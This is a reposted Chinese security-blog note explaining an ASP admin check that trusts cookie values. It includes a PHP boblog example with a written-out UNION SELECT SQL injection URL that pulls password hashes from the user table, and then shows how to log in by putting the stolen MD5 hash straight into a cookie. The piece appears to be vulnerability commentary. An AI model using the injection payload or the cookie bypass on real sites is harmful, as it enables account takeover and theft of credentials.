Php安全新闻早8点(2011-11-11 星期五)

admin
admin
admin
102262
文章
87
评论
2021年4月3日20:08:24评论45 views字数 817阅读2分43秒阅读模式

    转载自:http://hi.baidu.com/micropoor

if Request.Cookies("xxx")("user")="" or Request.Cookies("xxx")("admin_pass")="" or Request.Cookies("xxx")("admin_class")="" then
Response.Cookies("xxx")("user")=""
Response.Cookies("xxx")("pass")=""
Response.Cookies("xxx")("admin_class")=""
response.redirect "ad_login.asp"
response.end
end if
%>
'//代码片段--判断身份
>admin
>user
>guest

    结论:往往快捷方便,注定踏上了死亡路。

//php实例拓展:这里我引用下 心灵牛的一个例子:
//代码片段
if ($go) @list($job, $itemid)=@explode('_', basename($go));  
//略
原本注入语句为 
index.php?go=category_0) union select 1,concat(userpsw) from boblog_user%23
//略
假如某牛真的注入成功得到MD5密码不用去跑MD5了
直接
setcookie ('userid', '1',);
setcookie ('userpsw', 'md5密文', );

文章来源于lcx.cc:Php安全新闻早8点(2011-11-11 星期五)

相关推荐: 为何互联网上会存在大量代理服务器?代理发布站的代理是哪里来的?

为何、为什么互联网上会存在大量各种代理服务器?代理发布站的代理是哪里来的?这些代理发布站的信息又是从哪里来的呢? t00ls.net 有人问我这个问题…… anlfi 发表于 14 小时前 我在想 要是你抓的代理有效些 还是直接去扫的好 以前用过代理超人神马的…

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日20:08:24
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Php安全新闻早8点(2011-11-11 星期五)http://cn-sec.com/archives/325708.html

发表评论

匿名网友 填写信息